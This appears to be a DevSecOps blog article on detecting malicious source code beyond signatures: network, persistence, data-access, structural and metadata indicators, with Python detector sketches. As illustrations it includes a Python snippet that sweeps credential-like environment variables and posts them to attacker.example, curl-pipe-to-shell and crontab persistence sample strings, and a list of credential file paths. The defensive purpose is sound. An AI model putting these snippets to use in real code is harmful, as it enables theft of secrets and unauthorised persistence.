Source Code Malware Indicators: What to Look for Beyond Signatures

Signature-based scanners catch known malware. Novel malware gets through. These are the behavioural indicators, structural anomalies, and contextual signals that betray malicious code regardless of whether it's in any database.

DevSecOps Team | April 2026 | 13 min read | Tags: Malware Detection, SAST, AppSec

The Limits of Signature Detection

Signature-based malware scanning works by matching code against known patterns. A hash, a string, a sequence of bytes. It's effective for malware that has been previously identified and catalogued — and ineffective for everything else.

Supply chain malware campaigns are explicitly designed to evade signatures. Attackers generate new variants for each campaign, use obfuscation to change the byte-level signature, and host payloads externally so the package file itself contains no obvious malicious content.
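To make the evasion concrete, here is a minimal sketch of hash-based signature matching in Python. The payload string, the one-entry signature database, and the `matches_signature` helper are all hypothetical and exist only for illustration. Real scanners use richer signatures than a single digest, but the same weakness applies whenever the match depends on exact bytes.

```python
import hashlib

# Hypothetical signature database: SHA-256 digests of previously catalogued payloads.
KNOWN_PAYLOAD = b"import os; os.system('curl https://attacker.example/x | sh')"
SIGNATURE_DB = {hashlib.sha256(KNOWN_PAYLOAD).hexdigest()}


def matches_signature(payload: bytes) -> bool:
    """Return True if the payload's digest is in the signature database."""
    return hashlib.sha256(payload).hexdigest() in SIGNATURE_DB


# A functionally identical variant: only a trailing comment was added.
variant = KNOWN_PAYLOAD + b"  # build 2"

print(matches_signature(KNOWN_PAYLOAD))  # True
print(matches_signature(variant))        # False
```

A single appended comment changes the digest, so the catalogued sample matches while the behaviourally identical variant does not.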

The detection gap: Between the time malware is first deployed and the time it's added to a signature database, it operates undetected. For supply chain attacks targeting CI credentials, the window between first deployment and detection is measured in hours, which is enough to exfiltrate credentials from every CI run in that period.

Network Behaviour Indicators

Most malware needs to communicate with attacker infrastructure. Network behaviour indicators in source code:

Hardcoded external URLs in unexpected contexts — a utility library making outbound HTTPS calls to a domain unrelated to its stated purpose
Dynamic URL construction — building URLs from string concatenation or encoding rather than using explicit constants
DNS-based communication — dns.resolve(), getaddrinfo() calls with data-derived hostnames
Network calls in lifecycle hooks — any outbound call in postinstall, class constructors, module initialisation, or process exit handlers
Unconditional background requests — requests that fire regardless of application logic, especially on startup

Suspicious network call in module init (JavaScript)
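// Red flag: network call executes at module load time,
// before any application code runs
const { hostname } = require('os');
const https = require('https');

// Immediately invoked: runs on require()
(() => {
  // https.get() returns a ClientRequest, not a Promise, so failures are
  // silenced with an 'error' listener rather than .catch()
  https
    .get(
      `https://telemetry.example.com/ping?h=${hostname()}&v=${process.version}`,
      (res) => res.resume() // discard the response body
    )
    .on('error', () => {});
})();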
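The same "runs at load time" pattern can be looked for mechanically. The sketch below uses Python's standard `ast` module to flag calls rooted in a network-capable module that sit outside any function body, which means they execute on import. The `NETWORK_MODULES` set and the function name are assumptions made for this example. It is a heuristic, not a complete detector: aliased imports such as `from urllib.request import urlopen` slip past it.

```python
import ast

# Assumed list of module names treated as "network capable"; extend as needed.
NETWORK_MODULES = {"urllib", "http", "socket", "requests"}


def module_level_network_calls(source: str) -> list[int]:
    """Return line numbers of network-module calls that run at import time."""
    hits = []

    def visit(node):
        # Function and lambda bodies do not run at import time, so skip them.
        if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef, ast.Lambda)):
            return
        if isinstance(node, ast.Call):
            # Walk a dotted name such as urllib.request.urlopen back to its root.
            root = node.func
            while isinstance(root, ast.Attribute):
                root = root.value
            if isinstance(root, ast.Name) and root.id in NETWORK_MODULES:
                hits.append(node.lineno)
        for child in ast.iter_child_nodes(node):
            visit(child)

    visit(ast.parse(source))
    return sorted(hits)


SAMPLE = """\
import urllib.request

urllib.request.urlopen("https://telemetry.example.com/ping")

def fetch(url):
    return urllib.request.urlopen(url)
"""

print(module_level_network_calls(SAMPLE))  # [3]
```

Only the call on line 3 is reported. The call inside `fetch` is ordinary application logic that runs when a caller asks for it.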

Persistence Indicators

Malware that wants to survive a reboot, container restart, or package reinstall needs persistence mechanisms:

Cron job creation — writing to /etc/cron.d/, piping entries into crontab, or using OS scheduling APIs
Shell profile modification — writes to ~/.bashrc, ~/.profile, ~/.zshrc
Startup service registration — writing systemd unit files, launchd plists, or Windows registry run keys
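npm script injection — adding lifecycle scripts to the scripts section of package.json, or altering settings in ~/.npmrc (which holds key=value configuration, not scripts)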
Git hook installation — writing to .git/hooks/ directory in the checked-out repository
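Several of the persistence targets above appear as literal paths or command names in source, so a first-pass check can be a plain pattern scan. The sketch below is one way to do that in Python. The pattern set is an assumption derived from the list above (the systemd, launchd, and registry locations are common defaults, not an exhaustive inventory), and a match is a prompt for review rather than proof of malice.

```python
import re

# Assumed pattern set, derived from the list above; not exhaustive.
PERSISTENCE_PATTERNS = {
    "cron": re.compile(r"/etc/cron\.d/|\bcrontab\b"),
    "shell_profile": re.compile(r"\.(bashrc|profile|zshrc)\b"),
    "startup_service": re.compile(
        r"/etc/systemd/system/|LaunchAgents|CurrentVersion\\Run"
    ),
    "git_hook": re.compile(r"\.git/hooks/"),
}


def persistence_hits(source: str) -> dict[str, list[int]]:
    """Map each indicator name to the 1-based line numbers where it appears."""
    hits: dict[str, list[int]] = {}
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, pattern in PERSISTENCE_PATTERNS.items():
            if pattern.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits


SAMPLE = """\
import os
with open(os.path.expanduser("~/.bashrc"), "a") as f:
    f.write("curl -s https://attacker.example/x | sh\\n")
os.system("(crontab -l; echo '@reboot /tmp/.x') | crontab -")
"""

print(persistence_hits(SAMPLE))
```

For the sample, the scan reports a shell profile write on line 2 and a crontab invocation on line 4. Obfuscated or dynamically built paths will not match, which is why this works best alongside the other indicators.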

Data Access Indicators

What a piece of code accesses tells you a lot about its intent. Suspicious data access patterns:

Environment variable mass collection — iterating all environment variables rather than accessing specific named ones
Credential file access — reading ~/.aws/credentials, ~/.ssh/id_rsa, ~/.npmrc, ~/.docker/config.json
Browser data access — reading browser cookie files, saved passwords, or local storage
Clipboard access — reading system clipboard content (cryptocurrency wallet address replacement)
Keylogging APIs — hooking keyboard events at the OS level

Environment credential sweep (Python)
import os, json, urllib.request

# Mass environment variable sweep — high-confidence malware indicator
sensitive = {
    k: v for k, v in os.environ.items()
    if any(kw in k.lower() for kw in
       ['key', 'token', 'secret', 'password', 'aws', 'gcp', 'azure', 'api'])
}
urllib.request.urlopen(
    'https://attacker.example/collect',
    data=json.dumps(sensitive).encode()
)
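The distinction between reading one named variable and sweeping all of them is visible in the syntax tree. The following sketch, which assumes Python source and uses hypothetical function names, flags calls that enumerate or copy the whole of `os.environ` while ignoring targeted lookups such as `os.environ.get("HOME")`. It does not catch every form; a bare `for k in os.environ:` loop, for instance, would need an extra rule.

```python
import ast


def _is_os_environ(node: ast.AST) -> bool:
    """True for the expression `os.environ`."""
    return (
        isinstance(node, ast.Attribute)
        and node.attr == "environ"
        and isinstance(node.value, ast.Name)
        and node.value.id == "os"
    )


def env_mass_access_lines(source: str) -> list[int]:
    """Return line numbers where the whole of os.environ is enumerated or copied."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        # os.environ.items() / .keys() / .values() / .copy()
        if (
            isinstance(func, ast.Attribute)
            and func.attr in {"items", "keys", "values", "copy"}
            and _is_os_environ(func.value)
        ):
            hits.append(node.lineno)
        # dict(os.environ) or list(os.environ)
        elif (
            isinstance(func, ast.Name)
            and func.id in {"dict", "list"}
            and any(_is_os_environ(arg) for arg in node.args)
        ):
            hits.append(node.lineno)
    return sorted(hits)


SAMPLE = """\
import os
home = os.environ.get("HOME")
everything = {k: v for k, v in os.environ.items()}
snapshot = dict(os.environ)
"""

print(env_mass_access_lines(SAMPLE))  # [3, 4]
```

The targeted lookup on line 2 is left alone, while both whole-environment reads are reported.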

Structural Code Anomalies

Malicious code often has structural characteristics that differ from legitimate code:

Seemingly unreachable code following legitimate logic — blocks that look dead to a reader but sit behind a condition, so the static analyser doesn't flag them as dead code
Asymmetric function complexity — one function that is dramatically more complex than everything else in the file
Comment-code ratio outliers — malicious additions typically have no comments, creating a detectable gap in a well-commented codebase
String-heavy code without surrounding context — large string constants that have no obvious relationship to the function they appear in
Unexpected imports — a library that processes images importing network and process execution modules
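Asymmetric function complexity is one of the easier anomalies to approximate in code. The sketch below counts AST nodes per function as a rough size measure and reports functions far above the file's median. Both the node-count metric and the default `ratio` of 4.0 are assumptions chosen for illustration, not established thresholds, and functions that share a name are not distinguished.

```python
import ast
from statistics import median


def complexity_outliers(source: str, ratio: float = 4.0) -> list[str]:
    """Return names of functions whose AST node count exceeds ratio x the median."""
    tree = ast.parse(source)
    sizes = {
        node.name: sum(1 for _ in ast.walk(node))
        for node in ast.walk(tree)
        if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef))
    }
    if len(sizes) < 3:  # too few functions for a meaningful baseline
        return []
    baseline = median(sizes.values())
    return sorted(name for name, size in sizes.items() if size > ratio * baseline)


# Three small helpers plus one function padded with dense, unrelated statements.
SAMPLE = (
    "def add(a, b):\n    return a + b\n\n"
    "def sub(a, b):\n    return a - b\n\n"
    "def mul(a, b):\n    return a * b\n\n"
    "def resize(img):\n"
    + "".join(f"    x{i} = bytes([{i}, {i} ^ 0x5A]).hex()\n" for i in range(20))
    + "    return img\n"
)

print(complexity_outliers(SAMPLE))  # ['resize']
```

A legitimately complex function will also trip this check, so the result is a pointer for manual review rather than a verdict.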

Contextual and Metadata Signals

Beyond the code itself, metadata provides high-signal indicators:

New package with high download velocity — organic packages grow slowly; typosquatted packages get installs immediately from developer mistakes
Package published immediately before a CI run — coordinated attacks time publication to coincide with known CI schedules
Maintainer account age vs. package age — a maintainer account created days before publishing a popular-seeming package
Mismatch between package description and actual code — a package claiming to be a utility library that imports network and process modules
Empty or minimal source repository — a published package with no corresponding public source repository, or a repository with one commit

Combine signals for confidence. No single indicator is sufficient. A network call in a utility library might be legitimate telemetry. Environment variable access in a CLI tool is expected. It's the combination (network call + environment variable access + new package + no source repository) that supports a high-confidence malware classification.
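One simple way to express this combination rule is to count how many independent indicators are present and act only when several coincide. The sketch below does that for the four signals named above. The `Signals` fields, the 30-day cut-off for a "new" package, and the tier thresholds are all hypothetical values picked for the example and would need tuning against real data.

```python
from dataclasses import dataclass

# Hypothetical cut-off: packages younger than this count as "new".
NEW_PACKAGE_DAYS = 30


@dataclass
class Signals:
    network_call_at_import: bool = False
    env_mass_collection: bool = False
    package_age_days: int = 365
    has_source_repo: bool = True


def score(signals: Signals) -> int:
    """Count how many independent indicators are present."""
    return sum([
        signals.network_call_at_import,
        signals.env_mass_collection,
        signals.package_age_days < NEW_PACKAGE_DAYS,
        not signals.has_source_repo,
    ])


def classify(signals: Signals) -> str:
    """Map the indicator count to a triage tier (thresholds are illustrative)."""
    count = score(signals)
    if count >= 3:
        return "high-confidence"
    if count == 2:
        return "review"
    return "low"


telemetry_lib = Signals(network_call_at_import=True)
suspect = Signals(
    network_call_at_import=True,
    env_mass_collection=True,
    package_age_days=2,
    has_source_repo=False,
)

print(classify(telemetry_lib))  # low
print(classify(suspect))        # high-confidence
```

An equal-weight count keeps the logic easy to audit. A weighted score is a natural refinement once there is evidence about which indicators are more predictive.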
